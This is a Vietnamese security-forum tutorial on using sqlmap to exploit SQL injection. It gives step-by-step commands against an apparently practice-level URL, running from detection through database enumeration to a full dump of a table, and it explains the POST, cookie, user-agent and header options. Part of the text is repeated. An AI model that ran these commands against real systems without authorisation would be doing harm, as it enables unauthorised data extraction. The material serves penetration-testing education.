N
nonellldd
Guest
Hướng dẫn sử dụng SQLMAP để khai thác SQL Injection
N
- nonellldd
- 21.199 Lượt xem
Có bạn ez101 nói không hiểu rõ bài https://whitehat.vn/forum/thao-luan/...tool-khai-thac
Mình sẽ giải thích các lệnh sử dụng trong bài viết và giới thiệu thêm một số tùy chọn khác của SQLMAP
Đầu tiên SQLMAP bạn có thể download tại http://tools.whitehat.vn/download (Cần cài đặt python https://www.python.org/downloads/)
ok, bắt đầu với lệnh đầu tiên
Lệnh 1
Lệnh 2
Lệnh 3
Lệnh 4
Một số tùy chọn khác của sqlmap:
Còn rất nhiều các tùy chọn hữu ích thường được sử dụng để khai thác sqli bằng sqlmap, có thểm tham khảo thêm tại https://github.com/sqlmapproject/sqlmap/wiki/Usage hoặc sử dụng python sqlmap.py --help
Chúc các mem nữ 8.3 vui vẻ
Mình sẽ giải thích các lệnh sử dụng trong bài viết và giới thiệu thêm một số tùy chọn khác của SQLMAP
Đầu tiên SQLMAP bạn có thể download tại http://tools.whitehat.vn/download (Cần cài đặt python https://www.python.org/downloads/)
ok, bắt đầu với lệnh đầu tiên
Lệnh 1
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” "-u" theo sau là đường dẫn Lệnh này để kiểm tra url trên có dính lỗi sqli không
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs Khi đã xác định được url trên bị lỗi, sử dụng flag "--dbs" để liệt kê các database
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf Như trong bài viết đã liệt kê được 2 database là my_zerocoolhf và infomation_schema -D my_zerocoolhf: báo cho sqlmap.py biết chương trình sẽ làm việc với database my_zerocoolhf --table: dùng để liệt kê các bảng trong database my_zerocoolhf
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book Lệnh 3 đã liệt kê ra các bảng của my_zerocoolhf, lệnh 4 dùng để liệt kê ra tên cột có trong bảng book sự khác biệt giữa -T và --table là --table dùng để liệt kê, -T là lựa chọn để chương trình làm việc với bảng book
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book --dump: dùng để dump toàn bộ dữ liệu của bảng book
Mã:
--data="DATA" : sử dụng cho phương thức POST, ex: khi login thường hay sử dụng python sqlmap.py -u "url/path" --data "user=mark&passwd=line"
Mã:
--cookie="cookie" : sử dụng khi lỗ hổng nằm trong cookie
Mã:
--user-agent=AGENT : có thể ứng dụng kiểm tra trường user-agent trong header nên tùy chọn --user-agent sử dụng trong trường hợp này ex: python sqlmap.py -u "url/path" --data "user=mark&passwd=line" --user-agent "Mozilla/5.0 (Linux; ; ) AppleWebKit/ (KHTML, like Gecko) Chrome/ Mobile Safari/"
(user-agent của chrome trên android)
Mã:
--header HEADER | --headers HEADERS khi request cần thêm một số trường thì -H (--headers) được sử dụng
Chúc các mem nữ 8.3 vui vẻ
nonellldd
Chỉnh sửa lần cuối: